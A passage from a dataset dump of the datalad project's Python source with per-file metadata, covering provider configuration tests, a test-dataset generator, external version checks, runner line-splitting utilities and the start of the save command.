new one\n crap_provider = providers.get_provider(\"crap://crap.crap\")\n assert(crap_provider is not http_provider)\n assert(isinstance(crap_provider, Provider))\n\n\ndef test_Providers_process_credential():\n # If unknown type -- raises ValueError\n assert_raises(ValueError, Providers._process_credential, 'cred', {'type': '_unknown_'})\n\n\ndef test_get_downloader_class():\n url = 'http://example.com'\n\n with patch.object(external_versions, '_versions', {'requests': 1}):\n assert Provider._get_downloader_class(url) is HTTPDownloader\n\n with patch.object(external_versions, '_versions', {'requests': None}):\n with assert_raises(RuntimeError) as cmr:\n Provider._get_downloader_class(url)\n assert_in(\"you need 'requests'\", str(cmr.value))\n\n\n@with_tree(tree={\n 'providers': {'atest.cfg':\"\"\"\\\n[provider:syscrcns]\nurl_re = https?://crcns\\\\.org/.*\nauthentication_type = none\n\"\"\"}})\n@with_tree(tree={\n 'providers': {'atestwithothername.cfg':\"\"\"\\\n[provider:usercrcns]\nurl_re = https?://crcns\\\\.org/.*\nauthentication_type = none\n\"\"\"}})\n@with_tree(tree={\n '.datalad': {'providers': {'atest.cfg':\"\"\"\\\n[provider:dscrcns]\nurl_re = https?://crcns\\\\.org/.*\nauthentication_type = none\n\"\"\"}},\n '.git': { \"HEAD\" : \"\"}})\[email protected](\"platformdirs.AppDirs\", site_config_dir=None, user_config_dir=None)\ndef test_Providers_from_config__files(sysdir=None, userdir=None, dsdir=None):\n \"\"\"Test configuration file precedence\n\n Ensure that provider precedence works in the correct order:\n\n datalad defaults < dataset defaults < system defaults < user defaults\n \"\"\"\n\n # Test the default, this is an arbitrary provider used from another\n # test\n providers = Providers.from_config_files(reload=True)\n provider = providers.get_provider('https://crcns.org/data....')\n assert_equal(provider.name, 'crcns')\n\n # Test that the dataset provider overrides the datalad\n # default\n with chpwd(dsdir):\n providers = Providers.from_config_files(reload=True)\n provider = providers.get_provider('https://crcns.org/data....')\n assert_equal(provider.name, 'dscrcns')\n\n # Test that the system defaults take precedence over the dataset\n # defaults (we're still within the dsdir)\n with patch.multiple(\"platformdirs.AppDirs\", site_config_dir=sysdir, user_config_dir=None):\n providers = Providers.from_config_files(reload=True)\n provider = providers.get_provider('https://crcns.org/data....')\n assert_equal(provider.name, 
'syscrcns')\n\n # Test that the user defaults take precedence over the system\n # defaults\n with patch.multiple(\"platformdirs.AppDirs\", site_config_dir=sysdir, user_config_dir=userdir):\n providers = Providers.from_config_files(reload=True)\n provider = providers.get_provider('https://crcns.org/data....')\n assert_equal(provider.name, 'usercrcns')\n\n\n@with_tempfile(mkdir=True)\ndef test_providers_enter_new(path=None):\n with patch.multiple(\"platformdirs.AppDirs\", site_config_dir=None,\n user_config_dir=path):\n providers_dir = op.join(path, \"providers\")\n providers = Providers.from_config_files(reload=True)\n\n url = \"blah://thing\"\n url_re = r\"blah:\\/\\/.*\"\n auth_type = \"http_auth\"\n creds = \"user_password\"\n\n @with_testsui(responses=[\"foo\", url_re, auth_type,\n creds, \"no\"])\n def no_save():\n providers.enter_new(url)\n no_save()\n assert_false(op.exists(op.join(providers_dir, \"foo.cfg\")))\n\n @with_testsui(responses=[\"foo\", url_re, auth_type,\n creds, \"yes\"])\n def save():\n providers.enter_new(url)\n save()\n ok_exists(op.join(providers_dir, \"foo.cfg\"))\n\n create_tree(path=providers_dir, tree={\"exists.cfg\": \"\"})\n @with_testsui(responses=[\"exists\", \"foobert\", url_re,\n auth_type, creds, \"yes\"])\n def already_exists():\n providers.enter_new(url)\n already_exists()\n ok_exists(op.join(providers_dir, \"foobert.cfg\"))\n\n @with_testsui(responses=[\"crawdad\", \"yes\"])\n def known_provider():\n providers.enter_new(url)\n known_provider()\n\n @with_testsui(responses=[\"foo2\", url_re, auth_type,\n creds, \"yes\"])\n def auth_types():\n providers.enter_new(url, auth_types=[\"http_basic_auth\"])\n auth_types()\n ok_exists(op.join(providers_dir, \"foo2.cfg\"))\n\n @with_testsui(responses=[\"foo3\", \"doesn't match\", url_re, auth_type,\n creds, \"yes\"])\n def nonmatching_url():\n providers.enter_new(url, auth_types=[\"http_basic_auth\"])\n nonmatching_url()\n ok_exists(op.join(providers_dir, \"foo3.cfg\"))\n\n\n@with_tree(tree={'providers.cfg': \"\"\"\\\n[provider:foo0]\nurl_re = https?://foo\\\\.org/.*\nauthentication_type = none\n\n[provider:foo1]\nurl_re = https?://foo\\\\.org/.*\nauthentication_type = none\n\"\"\"})\ndef test_providers_multiple_matches(path=None):\n providers = Providers.from_config_files(\n files=[op.join(path, \"providers.cfg\")], reload=True)\n all_provs = providers.get_provider('https://foo.org/data',\n return_all=True)\n assert_equal({p.name for p in all_provs}, {'foo0', 'foo1'})\n\n # When selecting a single one, the later one is given priority.\n the_chosen_one = providers.get_provider('https://foo.org/data')\n assert_equal(the_chosen_one.name, \"foo1\")\n\n@with_tree(tree={'providers.cfg': \"\"\"\\\n[provider:foo0]\nurl_re = https?://[foo-a\\\\.org]/.*\nauthentication_type = none\n\n[provider:foo1]\nurl_re = https?://foo\\\\.org/.*\nauthentication_type = none\n\"\"\"})\ndef test_providers_badre(path=None):\n \"\"\"Test that a config with a bad regular expression doesn't crash\n\n Ensure that when a provider config has a bad url_re, there is no\n exception thrown and a valid warning is provided.\n \"\"\"\n\n providers = Providers.from_config_files(\n files=[op.join(path, \"providers.cfg\")], reload=True)\n\n # Regexes are evaluated when get_provider is called,\n # so we need to get a random provider, even though it\n # doesn't match.\n with swallow_logs(logging.WARNING) as msg:\n the_chosen_one = providers.get_provider('https://foo.org/data')\n assert_in(\"Invalid regex\", msg.out)\n" }, { "alpha_fraction": 
0.5725793838500977, "alphanum_fraction": 0.5772269368171692, "avg_line_length": 33.70429992675781, "blob_id": "6a3bd2bab6ec4d7027b3eadd017255d98b6911a2", "content_id": "af653aecec902ea91a50b26f6fdf21701b4b7dd5", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6455, "license_type": "permissive", "max_line_length": 94, "num_lines": 186, "path": "/datalad/distribution/create_test_dataset.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"A Helper to initiate arbitrarily small/large test meta-dataset\n\n\"\"\"\n\n__docformat__ = 'numpy'\n\n\nimport random\nimport logging\nimport tempfile\n\nfrom datalad.utils import get_tempfile_kwargs\nimport os\nfrom os.path import join as opj, exists, isabs, abspath\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.support.param import Parameter\nfrom datalad.support.constraints import EnsureStr, EnsureNone, EnsureInt\nfrom datalad.support.gitrepo import GitRepo\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.interface.base import Interface\nfrom datalad.interface.base import build_doc\n\nlgr = logging.getLogger('datalad.distribution.tests')\n\n\ndef _parse_spec(spec):\n out = [] # will return a list of tuples (min, max) for each layer\n if not spec:\n return out\n for ilevel, level in enumerate(spec.split('/')):\n if not level:\n continue\n minmax = level.split('-')\n if len(minmax) == 1: # only abs number specified\n minmax = int(minmax[0])\n min_, max_ = (minmax, minmax)\n elif len(minmax) == 2:\n min_, max_ = minmax\n if not min_: # might be omitted entirely\n min_ = 0\n if not max_:\n raise ValueError(\"Specify max number at level %d. Full spec was: %s\"\n % (ilevel, spec))\n min_ = int(min_)\n max_ = int(max_)\n else:\n raise ValueError(\"Must have only min-max at level %d\" % ilevel)\n out.append((min_, max_))\n return out\n\n\ndef _makeds(path, levels, ds=None, max_leading_dirs=2):\n \"\"\"Create a hierarchy of datasets\n\n Used recursively, with current invocation generating datasets for the\n first level, and delegating sub-levels to recursive invocation\n\n Parameters\n ----------\n path : str\n Path to the top directory under which dataset will be created.\n If relative -- relative to current directory\n levels : list of list\n List of specifications for :func:`random.randint` call per each level.\n ds : Dataset, optional\n Super-dataset which would contain a new dataset (thus its path would be\n a parent of path. Note that ds needs to be installed.\n max_leading_dirs : int, optional\n Up to how many leading directories within a dataset could lead to a\n sub-dataset\n\n Yields\n ------\n str\n Path to the generated dataset(s)\n\n \"\"\"\n # we apparently can't import api functionality within api\n from datalad.api import save\n # To simplify managing all the file paths etc\n if not isabs(path):\n path = abspath(path)\n # make it a git (or annex??) repository... 
ok - let's do randomly one or another ;)\n RepoClass = GitRepo if random.randint(0, 1) else AnnexRepo\n lgr.info(\"Generating repo of class %s under %s\", RepoClass, path)\n repo = RepoClass(path, create=True)\n # let's create some dummy file and add it to the beast\n fn = opj(path, \"file%d.dat\" % random.randint(1, 1000))\n with open(fn, 'w') as f:\n f.write(fn)\n repo.add(fn, git=True)\n repo.commit(msg=\"Added %s\" % fn)\n\n yield path\n\n if levels:\n # make a dataset for that one since we want to add sub datasets\n ds_ = Dataset(path)\n # Process the levels\n level, levels_ = levels[0], levels[1:]\n nrepos = random.randint(*level) # how many subds to generate\n for irepo in range(nrepos):\n # we would like to have up to 2 leading dirs\n subds_path = opj(*(['d%i' % i\n for i in range(random.randint(0, max_leading_dirs+1))]\n + ['r%i' % irepo]))\n subds_fpath = opj(path, subds_path)\n # yield all under\n for d in _makeds(subds_fpath, levels_, ds=ds_):\n yield d\n\n if ds:\n assert ds.is_installed()\n out = save(\n path,\n dataset=ds,\n )\n\n\n@build_doc\nclass CreateTestDataset(Interface):\n \"\"\"Create test (meta-)dataset.\n \"\"\"\n\n _params_ = dict(\n path=Parameter(\n args=(\"path\",),\n doc=\"path/name where to create (if specified, must not exist)\",\n constraints=EnsureStr() | EnsureNone()),\n spec=Parameter(\n args=(\"--spec\",),\n doc=\"\"\"\\\n spec for hierarchy, defined as a min-max (min could be omitted to assume 0)\n defining how many (random number from min to max) of sub-datasets to generate\n at any given level of the hierarchy. Each level separated from each other with /.\n Example: 1-3/-2 would generate from 1 to 3 subdatasets at the top level, and\n up to two within those at the 2nd level\n \"\"\",\n constraints=EnsureStr() | EnsureNone()),\n seed=Parameter(\n args=(\"--seed\",),\n doc=\"\"\"seed for rng\"\"\",\n constraints=EnsureInt() | EnsureNone()),\n\n )\n\n @staticmethod\n def __call__(path=None, *, spec=None, seed=None):\n levels = _parse_spec(spec)\n\n if seed is not None:\n # TODO: if to be used within a bigger project we shouldn't seed main RNG\n random.seed(seed)\n if path is None:\n kw = get_tempfile_kwargs({}, prefix=\"ds\")\n path = tempfile.mkdtemp(**kw)\n else:\n # so we don't override anything\n assert not exists(path)\n os.makedirs(path)\n\n # now we should just make it happen and return list of all the datasets\n return list(_makeds(path, levels))\n\n @staticmethod\n def result_renderer_cmdline(res, args):\n from datalad.ui import ui\n if res is None:\n res = []\n if not len(res):\n ui.message(\"No repos were created... 
oops\")\n return\n items = '\\n'.join(map(str, res))\n msg = \"{n} installed {obj} available at\\n{items}\".format(\n obj='items are' if len(res) > 1 else 'item is',\n n=len(res),\n items=items)\n ui.message(msg)\n" }, { "alpha_fraction": 0.6160497665405273, "alphanum_fraction": 0.632080078125, "avg_line_length": 33.424747467041016, "blob_id": "201c2d182d452f40781464ccf9f1219e63460513", "content_id": "6b69d3f7d85eca2fddfaf73e9ad489322919b550", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10293, "license_type": "permissive", "max_line_length": 99, "num_lines": 299, "path": "/datalad/support/tests/test_external_versions.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\nimport logging\nimport pytest\nfrom os import linesep\n\nfrom datalad import __version__\nfrom datalad.cmd import StdOutErrCapture, WitlessRunner\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.exceptions import (\n CommandError,\n MissingExternalDependency,\n OutdatedExternalDependency,\n)\nfrom datalad.tests.utils_pytest import (\n SkipTest,\n assert_equal,\n assert_false,\n assert_greater,\n assert_greater_equal,\n assert_in,\n assert_not_in,\n assert_raises,\n assert_true,\n create_tree,\n patch,\n set_annex_version,\n swallow_logs,\n with_tempfile,\n)\n\nfrom ..external_versions import (\n ExternalVersions,\n LooseVersion,\n)\n\n\n# just to ease testing\ndef cmp(a, b):\n return (a > b) - (a < b)\n\n\ndef test_external_versions_basic():\n ev = ExternalVersions()\n our_module = 'datalad'\n assert_equal(ev.versions, {})\n assert_equal(ev[our_module], __version__)\n # and it could be compared\n assert_greater_equal(ev[our_module], __version__)\n # We got some odd failure in this test not long are after switching to versionner\n # https://github.com/datalad/datalad/issues/5785. Verify that we do get expected\n # data types\n our_version = ev[our_module].version\n assert isinstance(our_version, (str, list)), f\"Got {our_version!r} of type {type(our_version)}\"\n assert_greater(ev[our_module], '0.1')\n assert_equal(list(ev.keys()), [our_module])\n assert_true(our_module in ev)\n assert_false('unknown' in ev)\n\n # all are LooseVersions now\n assert_true(isinstance(ev[our_module], LooseVersion))\n version_str = __version__\n assert_equal(ev.dumps(), \"Versions: %s=%s\" % (our_module, version_str))\n\n # For non-existing one we get None\n assert_equal(ev['custom__nonexisting'], None)\n # and nothing gets added to _versions for nonexisting\n assert_equal(set(ev.versions.keys()), {our_module})\n\n # but if it is a module without version, we get it set to UNKNOWN\n assert_equal(ev['os'], ev.UNKNOWN)\n # And get a record on that inside\n assert_equal(ev.versions.get('os'), ev.UNKNOWN)\n # And that thing is \"True\", i.e. 
present\n assert(ev['os'])\n # but not comparable with anything besides itself (was above)\n assert_raises(TypeError, cmp, ev['os'], '0')\n assert_raises(TypeError, assert_greater, ev['os'], '0')\n\n return\n ## Code below is from original duecredit, and we don't care about\n ## testing this one\n ## And we can get versions based on modules themselves\n #from datalad.tests import mod\n #assert_equal(ev[mod], mod.__version__)\n\n ## Check that we can get a copy of the versions\n #versions_dict = ev.versions\n #versions_dict[our_module] = \"0.0.1\"\n #assert_equal(versions_dict[our_module], \"0.0.1\")\n #assert_equal(ev[our_module], __version__)\n\n\ndef test_external_version_contains():\n ev = ExternalVersions()\n assert_true(\"datalad\" in ev)\n assert_false(\"does not exist\" in ev)\n\n\ndef test_external_versions_unknown():\n assert_equal(str(ExternalVersions.UNKNOWN), 'UNKNOWN')\n\n\ndef _test_external(ev, modname):\n try:\n exec(\"import %s\" % modname, globals(), locals())\n except ImportError:\n raise SkipTest(\"External %s not present\" % modname)\n except Exception as e:\n raise SkipTest(\"External %s fails to import\" % modname) from e\n assert (ev[modname] is not ev.UNKNOWN)\n assert_greater(ev[modname], '0.0.1')\n assert_greater('1000000.0', ev[modname]) # unlikely in our lifetimes\n\n\ndef test_external_versions_popular_packages():\n ev = ExternalVersions()\n\n for modname in ('scipy', 'numpy', 'mvpa2', 'sklearn', 'statsmodels', 'pandas',\n 'matplotlib', 'psychopy', 'github'):\n _test_external(ev, modname)\n\n # more of a smoke test\n assert_false(linesep in ev.dumps())\n assert_true(ev.dumps(indent=True).endswith(linesep))\n\n\n@with_tempfile(mkdir=True)\ndef test_external_versions_rogue_module(topd=None):\n ev = ExternalVersions()\n # if module throws some other non-ImportError exception upon import\n # we must not crash, but issue a warning\n modname = 'verycustomrogue__'\n create_tree(topd, {modname + '.py': 'raise Exception(\"pickaboo\")'})\n with patch('sys.path', [topd]), \\\n swallow_logs(new_level=logging.WARNING) as cml:\n assert ev[modname] is None\n assert_true(ev.dumps(indent=True).endswith(linesep))\n assert_in('pickaboo', cml.out)\n\n\ndef test_custom_versions():\n ev = ExternalVersions()\n assert(ev['cmd:annex'] > '6.20160101') # annex must be present and recentish\n assert_equal(set(ev.versions.keys()), {'cmd:annex'})\n # some older git version don't support files to be passed to\n # `commit` call under some conditions and this will lead to diverse\n # errors\n assert(ev['cmd:git'] > '2.0') # git must be present and recentish\n assert(isinstance(ev['cmd:git'], LooseVersion))\n assert_equal(set(ev.versions.keys()), {'cmd:annex', 'cmd:git'})\n\n # and there is also a version of system-wide installed git, which might\n # differ from cmd:git but should be at least good old 1.7\n assert(ev['cmd:system-git'] > '1.7')\n\n ev.CUSTOM = {'bogus': lambda: 1 / 0}\n assert_equal(ev['bogus'], None)\n assert_equal(set(ev.versions), {'cmd:annex', 'cmd:git', 'cmd:system-git'})\n\n\ndef test_ancient_annex():\n\n class _runner(object):\n def run(self, cmd, *args, **kwargs):\n if '--raw' in cmd:\n raise CommandError\n return dict(stdout=\"git-annex version: 0.1\", stderr=\"\")\n\n ev = ExternalVersions()\n with patch('datalad.support.external_versions._runner', _runner()):\n assert_equal(ev['cmd:annex'], '0.1')\n\n\ndef _test_annex_version_comparison(v, cmp_):\n class _runner(object):\n def run(self, cmd, *args, **kwargs):\n return dict(stdout=v, stderr=\"\")\n\n ev = 
ExternalVersions()\n with set_annex_version(None), \\\n patch('datalad.support.external_versions._runner', _runner()), \\\n patch('datalad.support.annexrepo.external_versions',\n ExternalVersions()):\n ev['cmd:annex'] < AnnexRepo.GIT_ANNEX_MIN_VERSION\n if cmp_ in (1, 0):\n AnnexRepo._check_git_annex_version()\n if cmp_ == 0:\n assert_equal(AnnexRepo.git_annex_version, v)\n elif cmp == -1:\n with assert_raises(OutdatedExternalDependency):\n ev.check('cmd:annex', min_version=AnnexRepo.GIT_ANNEX_MIN_VERSION)\n with assert_raises(OutdatedExternalDependency):\n AnnexRepo._check_git_annex_version()\n\n\ndef test_annex_version_comparison():\n # see https://github.com/datalad/datalad/issues/1128\n for cmp_, base in [(-1, '6.2011'), (1, \"2100.0\")]:\n # there could be differing versions of a version\n # release, snapshot, neurodebian build of a snapshot\n for v in base, base + '-g0a34f08', base + '+gitg9f179ae-1~ndall+1':\n # they all must be comparable to our specification of min version\n _test_annex_version_comparison(v, cmp_)\n _test_annex_version_comparison(str(AnnexRepo.GIT_ANNEX_MIN_VERSION), 0)\n\n\ndef _test_list_tuple(thing):\n version = ExternalVersions._deduce_version(thing)\n assert_greater(version, '0.0.1')\n assert_greater('0.2', version)\n assert_equal('0.1', version)\n assert_equal(version, '0.1')\n\n\ndef test_list_tuple():\n\n class thing_with_tuple_version:\n __version__ = (0, 1)\n\n class thing_with_list_version:\n __version__ = [0, 1]\n\n for v in thing_with_list_version, thing_with_tuple_version, '0.1', (0, 1), [0, 1]:\n _test_list_tuple(v)\n\n\ndef test_system_ssh_version():\n try:\n WitlessRunner().run(['ssh', '-V'], protocol=StdOutErrCapture)\n except FileNotFoundError as exc:\n pytest.skip(f\"no ssh binary available: {exc}\")\n ev = ExternalVersions()\n assert ev['cmd:system-ssh'] # usually we have some available at boxes we test\n\n\ndef test_ssh_versions():\n for s, v in [\n ('OpenSSH_7.4p1 Debian-6, OpenSSL 1.0.2k 26 Jan 2017', '7.4p1'),\n ('OpenSSH_8.1p1, LibreSSL 2.7.3', '8.1p1'),\n ('OpenSSH_for_Windows_8.1p1, LibreSSL 3.0.2', '8.1p1'),\n ]:\n ev = ExternalVersions()\n # TODO: figure out leaner way\n class _runner(object):\n def run(self, cmd, *args, **kwargs):\n return dict(stdout=\"\", stderr=s)\n with patch('datalad.support.external_versions._runner', _runner()):\n assert_equal(ev['cmd:system-ssh'], v)\n\n\ndef test_humanize():\n # doesn't provide __version__\n assert ExternalVersions()['humanize']\n\n\ndef test_check():\n ev = ExternalVersions()\n # should be all good\n ev.check('datalad')\n ev.check('datalad', min_version=__version__)\n\n with assert_raises(MissingExternalDependency):\n ev.check('dataladkukaracha')\n with assert_raises(MissingExternalDependency) as cme:\n ev.check('dataladkukaracha', min_version=\"buga\", msg=\"duga\")\n\n assert_in(\"duga\", str(cme.value))\n\n with assert_raises(OutdatedExternalDependency):\n ev.check('datalad', min_version=\"10000000\") # we will never get there!\n\n\ndef test_add():\n ev = ExternalVersions()\n ev.add('custom1', lambda: \"0.1.0\")\n assert_in(\"custom1=0.1.0\", ev.dumps(query=True))\n assert_not_in(\"numpy\", ev.INTERESTING) # we do not have it by default yet\n assert_not_in(\"numpy=\", ev.dumps(query=True))\n ev.add('numpy')\n try:\n import numpy\n except ImportError:\n # no numpy, we do not have some bogus entry\n assert_not_in(\"numpy=\", ev.dumps(query=True))\n else:\n assert_in(\"numpy=%s\" % numpy.__version__, ev.dumps(query=True))\n assert_in(\"custom1=0.1.0\", ev.dumps(query=True)) # we still have 
that one\n\n # override with a new function will work\n ev.add('custom1', lambda: \"0.2.0\")\n assert_in(\"custom1=0.2.0\", ev.dumps(query=True))\n" }, { "alpha_fraction": 0.5761099457740784, "alphanum_fraction": 0.5782241225242615, "avg_line_length": 36.58940505981445, "blob_id": "a0b87d272e25c78e43fb4624373d4f08b398c66d", "content_id": "743d2fb78a302ecc085c4482c76286845d2846f2", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5676, "license_type": "permissive", "max_line_length": 87, "num_lines": 151, "path": "/datalad/runner/utils.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Utilities required by runner-related functionality\n\nAll runner-related code imports from here, so this is a comprehensive declaration\nof utility dependencies.\n\"\"\"\nfrom __future__ import annotations\n\nimport logging\nfrom collections import defaultdict\nfrom typing import Optional\n\n__docformat__ = \"numpy\"\n\nlogger = logging.getLogger(\"datalad.runner.utils\")\n\n\nclass LineSplitter:\n \"\"\"\n A line splitter that handles 'streamed content' and is based\n on python's built-in splitlines().\n \"\"\"\n def __init__(self,\n separator: Optional[str] = None,\n keep_ends: bool = False\n ) -> None:\n \"\"\"\n Create a line splitter that will split lines either on a given\n separator, if 'separator' is not None, or on one of the known line\n endings, if 'separator' is None, the line endings are determined by\n python, they include, for example, \"\\n\", and \"\\r\\n\".\n\n Parameters\n ----------\n separator: Optional[str]\n If not None, the provided separator will be used to split lines.\n keep_ends: bool\n If True, the separator will be contained in the returned lines.\n \"\"\"\n self.separator = separator\n self.keep_ends = keep_ends\n self.remaining_data: str | None = None\n\n def process(self,\n data: str\n ) -> list[str]:\n\n assert isinstance(data, str), f\"data ({data}) is not of type str\"\n\n # There is nothing to do if we do not get any data, since\n # remaining data would not change, and if it is not None,\n # it has already been parsed.\n if data == \"\":\n return []\n\n # Update remaining data before attempting to split lines.\n if self.remaining_data is None:\n self.remaining_data = \"\"\n self.remaining_data += data\n\n if self.separator is None:\n # If no separator was specified, use python's built in\n # line split wisdom to split on any known line ending.\n lines_with_ends = self.remaining_data.splitlines(keepends=True)\n detected_lines = self.remaining_data.splitlines()\n\n # If the last line is identical in lines with ends and\n # lines without ends, it was unterminated, remove it\n # from the list of detected lines and keep it for the\n # next round\n if lines_with_ends[-1] == detected_lines[-1]:\n self.remaining_data = lines_with_ends[-1]\n del lines_with_ends[-1]\n del detected_lines[-1]\n else:\n self.remaining_data = None\n\n if self.keep_ends:\n return lines_with_ends\n return detected_lines\n\n else:\n # Split lines on separator. 
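            # --- Editor's illustrative aside (not part of the upstream module):
            # the separator branch behaves like str.split() plus bookkeeping for
            # a trailing, unterminated chunk. For example, with
            # LineSplitter(separator=";") and keep_ends=False:
            #
            #   splitter = LineSplitter(separator=";")
            #   splitter.process("a;b;partial")    # -> ["a", "b"]
            #   splitter.process(";c;")            # -> ["partial", "c"]
            #   splitter.finish_processing()       # -> None (nothing left over)
            #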
This will create additional\n # empty lines if `remaining_data` end with the separator.\n detected_lines = self.remaining_data.split(self.separator)\n\n # If replaced data did not end with the separator, it contains an\n # unterminated line. We save that for the next round. Otherwise,\n # we mark that we do not have remaining data.\n if not data.endswith(self.separator):\n self.remaining_data = detected_lines[-1]\n else:\n self.remaining_data = None\n\n # If replaced data ended with the canonical line ending, we\n # have an extra empty line in detected_lines. If it did not\n # end with canonical line ending, we have to remove the\n # unterminated line.\n del detected_lines[-1]\n\n if self.keep_ends:\n return [line + self.separator for line in detected_lines]\n return detected_lines\n\n def finish_processing(self) -> Optional[str]:\n return self.remaining_data\n\n\nclass AssemblingDecoderMixIn:\n \"\"\" Mix in to safely decode data that is delivered in parts\n\n This class can be used to decode data that is partially delivered.\n It detects partial encodings and stores the non-decoded data to\n combine it with additional data, that is delivered later, and\n decodes the combined data.\n\n Any un-decoded data is stored in the 'remaining_data'-attribute.\n \"\"\"\n def __init__(self) -> None:\n self.remaining_data: dict[int, bytes] = defaultdict(bytes)\n\n def decode(self,\n fd: int,\n data: bytes,\n encoding: str\n ) -> str:\n assembled_data = self.remaining_data[fd] + data\n try:\n unicode_str = assembled_data.decode(encoding)\n self.remaining_data[fd] = b''\n except UnicodeDecodeError as e:\n unicode_str = assembled_data[:e.start].decode(encoding)\n self.remaining_data[fd] = assembled_data[e.start:]\n return unicode_str\n\n def __del__(self) -> None:\n if any(self.remaining_data.values()):\n logger.debug(\n \"unprocessed data in AssemblingDecoderMixIn:\\n\"\n +\"\\n\".join(\n f\"fd: {key}, data: {value!r}\"\n for key, value in self.remaining_data.items())\n + \"\\n\")\n logger.warning(\"unprocessed data in AssemblingDecoderMixIn\")\n" }, { "alpha_fraction": 0.5420165657997131, "alphanum_fraction": 0.5433084964752197, "avg_line_length": 41.5724983215332, "blob_id": "4fe11861b39e9195fd9d9905b6a1e15858d50204", "content_id": "6a193f2aee9db38961199f5aa68730c2e87d55b9", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 17029, "license_type": "permissive", "max_line_length": 88, "num_lines": 400, "path": "/datalad/core/local/save.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Interface to add content, and save modifications to a dataset\n\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nimport logging\nfrom functools import partial\nfrom pathlib import Path\n\nimport datalad.utils as ut\nfrom datalad.distribution.dataset import (\n Dataset,\n EnsureDataset,\n datasetmethod,\n require_dataset,\n)\nfrom datalad.interface.base import (\n Interface,\n build_doc,\n eval_results,\n)\nfrom datalad.interface.common_opts import (\n jobs_opt,\n recursion_flag,\n recursion_limit,\n save_message_opt,\n)\nfrom 
datalad.interface.utils import (\n discover_dataset_trace_to_targets,\n get_tree_roots,\n)\nfrom datalad.support.constraints import (\n EnsureNone,\n EnsureStr,\n)\nfrom datalad.support.exceptions import CommandError\nfrom datalad.support.parallel import (\n ProducerConsumerProgressLog,\n no_subds_in_futures,\n)\nfrom datalad.support.param import Parameter\nfrom datalad.utils import ensure_list\n\nfrom .status import Status\n\nlgr = logging.getLogger('datalad.core.local.save')\n\n\n@build_doc\nclass Save(Interface):\n \"\"\"Save the current state of a dataset\n\n Saving the state of a dataset records changes that have been made to it.\n This change record is annotated with a user-provided description.\n Optionally, an additional tag, such as a version, can be assigned to the\n saved state. Such tag enables straightforward retrieval of past versions at\n a later point in time.\n\n .. note::\n Before Git v2.22, any Git repository without an initial commit located\n inside a Dataset is ignored, and content underneath it will be saved to\n the respective superdataset. DataLad datasets always have an initial\n commit, hence are not affected by this behavior.\n \"\"\"\n # note above documents that out behavior is like that of `git add`, but\n # does not explicitly mention the connection to keep it simple.\n\n _examples_ = [\n dict(text=\"\"\"Save any content underneath the current directory, without\n altering any potential subdataset\"\"\",\n code_py=\"save(path='.')\",\n code_cmd=\"datalad save .\"),\n dict(text=\"\"\"Save specific content in the dataset\"\"\",\n code_py=\"save(path='myfile.txt')\",\n code_cmd=\"datalad save myfile.txt\"),\n dict(text=\"\"\"Attach a commit message to save\"\"\",\n code_py=\"save(path='myfile.txt', message='add file')\",\n code_cmd=\"datalad save -m 'add file' myfile.txt\"),\n dict(text=\"\"\"Save any content underneath the current directory, and\n recurse into any potential subdatasets\"\"\",\n code_py=\"save(path='.', recursive=True)\",\n code_cmd=\"datalad save . -r\"),\n dict(text=\"Save any modification of known dataset content in the \"\n \"current directory, but leave untracked files (e.g. temporary files) \"\n \"untouched\",\n code_py=\"\"\"save(path='.', updated=True)\"\"\",\n code_cmd=\"\"\"datalad save -u .\"\"\"),\n dict(text=\"Tag the most recent saved state of a dataset\",\n code_py=\"save(version_tag='bestyet')\",\n code_cmd=\"datalad save --version-tag 'bestyet'\"),\n dict(text=\"Save a specific change but integrate into last commit keeping \"\n \"the already recorded commit message\",\n code_py=\"save(path='myfile.txt', amend=True)\",\n code_cmd=\"datalad save myfile.txt --amend\")\n ]\n\n _params_ = dict(\n dataset=Parameter(\n args=(\"-d\", \"--dataset\"),\n doc=\"\"\"\"specify the dataset to save\"\"\",\n constraints=EnsureDataset() | EnsureNone()),\n path=Parameter(\n args=(\"path\",),\n metavar='PATH',\n doc=\"\"\"path/name of the dataset component to save. If given, only\n changes made to those components are recorded in the new state.\"\"\",\n 